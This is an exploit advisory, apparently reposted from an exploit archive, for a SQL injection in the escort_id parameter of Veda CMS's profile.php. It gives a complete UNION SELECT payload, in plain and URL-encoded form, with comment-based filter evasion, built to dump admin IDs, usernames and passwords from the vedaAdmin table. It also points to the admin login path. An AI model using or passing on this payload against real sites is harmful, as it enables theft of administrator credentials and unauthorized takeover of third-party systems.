facebook facebook twitter rss

Veda CMS - SQL Injection

Author: Dr.web , Published: 17-11-2014
***************************************************
# Title: Veda CMS - SQL Injection
# Author: Dr.web
# Vendor Homepage: http://vedadesigns.net/
# Contact: u8p@hotmail.com ; skype: dr.web559
# Greets To: Brg alshmail - a!7rBi - x_man_3r3r - jsass - Hannibal Ksa - QaTaR-Attack - mr.hx - XP - r3m0t3Nu11 - xdr.devilx - ابو اميره
# !! الثغره التي طرحت ستكون مسؤول في استخدامها أمام الله .. وأنا ابرء الذمه من الاستغلال السيئ لها ,, لأنها مجرد تطوير لمعلوماتك
***************************************************
a) SQL Injection
parameter Infected ( escort_id )

# information english

# Most of the sites that ride pornographic Scripts - Loophole raised will be responsible in their use before God .. I exonerate disclosure of bad exploitation of her,, they just develop FYI

# information arabic

# معظم المواقع الي مركبه سكربت اباحية - وانا برئ براه كامله منها بستخدام سئ و مشاهده صور اباحية و غير ذلك


# are you ready :D


# login admin -> : /vedacms/login.php
# file infected -> : profile.php
# Full exploitation -> : /profile.php?escort_id=-4'+/*!12345UnIoN*/+/*!12345sElEcT*/+1,group_concat(admin_id,0x3a,admin_name,0x3a,admin_pass),3,4,5,6,7,8,9,10,11+from+vedaAdmin--+--
# exp : http://localhost/pentester/scripts/vedacms/profile.php?escort_id=-4%27+/*!12345UnIoN*/+/*!12345sElEcT*/+1,group_concat%28admin_id,0x3a,admin_name,0x3a,admin_pass%29,3,4,5,6,7,8,9,10,11+from+vedaAdmin

Like us on Facebook :